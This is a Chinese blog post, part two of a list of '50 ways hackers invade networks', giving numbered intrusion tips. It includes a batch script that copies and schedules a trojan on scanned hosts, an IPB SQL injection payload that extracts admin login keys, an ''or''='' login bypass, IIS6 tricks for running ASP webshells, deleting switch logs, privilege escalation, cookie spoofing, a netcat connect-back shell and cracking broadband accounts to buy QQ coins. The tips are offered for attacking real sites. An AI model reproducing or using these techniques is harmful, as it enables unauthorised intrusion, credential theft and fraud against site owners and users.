经验总结 黑客入侵网络的50种方法2

21.批量种植木马.bat 
  for /f %%i in (扫描地址.txt) do copy pc.exe %%i\admin$ 复制木马到扫描的计算机当中
  for /f %%i in (扫描地址.txt) do at %%i 09:50 pc.exe 在对方计算机上运行木马的时间
  扫描地址.txt里每个主机名一行 用\\开头
  22.搜索 Powered by Discuz!4.0.0RC3 开放头像的可利用 工具地址www.hack6.com
  23.DV7.1用还原数据功能 还原asa木马
  24.凡人网络购物系统V6.0 可以%5c暴库
  25.IPB2.0.2漏洞 构造语句
  $qpid=1) and 1=2 union select 1,2,3,4,5,6,7,8,9,10,member_login_key,12,13,14,15,16,17,18,19,1 from ibf_members where id=1 /* 暴管理员密码 想看动画到黑基里找 IPB<= 2.0.3论坛注入工具 www.hack6.com有下载
  26. 将工具传到邮箱 在下载上右击 复制快捷方式 拥有自己了的下载空间
  27.北京冲QB要宽带号跟绑定宽带的后4位电话,当你扫出北京款待号的密码必须是8位的密码,而且开头是6或8的才可以,因为北京的电话都是6根8开头的而且都是8位的,北京的区名海淀 东城 西城 门头沟 丰台 潮阳 宣武 通州 昌平,去http://cnc.qq.com/bbn/冲
  28.搜索 企业网络办公系统 添"or""=" 登陆 在个人邮箱 上传asp木马
  29.本人原创 搜索"一点点星空驿站 留言本" 默认数据库是gbmdb.mdb 很多网站用这个留言本 但是用搜索引擎搜不到 可以给大家在入寝时多个思路
  30.在程序上传shell过程中,程序不允许包含标记符号的内容的文件上传,比如蓝屏最小 的asp木马,我们来把他的标签换一下: 保存为.asp,程序照样 执行.
  31.目录权限设置变态的话可以用一些方法(比如serv-u溢出)将此web用户提权 可访问全站目录挂马
  32.喜欢网页挂马的看看这篇总结文章吧
  http://77169.com/News/hk/2005060611656.html
  33.搜索"images/admin" 或".tw/images/admin" 可以找到些台湾的数据库
  34.IIS6 For Windows 2003 Enterprise Edition 如IIS发布目录文件夹包含.asp后辍名.
  将.asp后辍改为.jpg或其它的如.htm,也可以运行asp,但要在.asp文件夹下.
  .cer 等后缀的文件夹下都可以运行任何后缀的asp木马
  35.telnet一台交换机 然后在telnet控制主机 控制主机留下的是交换机的IP
  然后用#clear logg和#clear line vty *删除日志
  36.搜索关键字:"Copyright 2003-2004 动易网络" 后面地址改成upfile_soft.asp 这样的漏洞很多
  37.bbsxp的漏洞总结 Powered by BBSxp 5.15/Licence blog.asp中的对id 的过滤不严的漏洞 拿到管理员的前后台密码 工具:bbsxp完全版 cookies 欺骗 bbsxp 过滤了 asp 文件的上传 所以我们这里用 asa 来传马
  38.学会总结入侵思路http://www.77169.com/News/hk/2005060811688.html
  39.电脑坏了省去重新安装系统的方法
  纯dos下执行,
  xp:copy C:\WINDOWS\repair\*.* 到c:\windows\system32\config
  2k: copy C:\winnt\repair\*.* 到c:\winnt\system32\config
  40.一般人设置啊拉QQ大盗的时候发信和收信都是同一个信箱,因此当我的机子中了此木马后没有立即杀掉进程,而是用内存编辑工具打开它的进程,查找smtp字样,就会找到它的信箱和密码了。只对1.5以前的管用.
  41.内网控制内网 用vidc 还要有一只肉鸡 动画看黑基的
  http://soft.77169.com/62/20050608/6878.html
  42.有许多管理员用备份的日期做备份数据库的名字
  比如http://www.hack6.com/bbs/databackup/20050601.mdb
  43.动网数据库oldusername=%B5%F0%B7%C0&username2=%B5%F0%B7%C0&password2=19841202&adduser=%B5%F0%B7%C0&id=12&Submit=%B8%FC+%D0%C2
  不知道用户名(不是%B8%F0%B7%C0) 转化这个用他本身的页面
  http://www.hack6.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2
  %CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2这句话意思是“填写登录信息”
  那么就把%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2换成%B5%F0%B7%C0 可以看到用户名
  44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值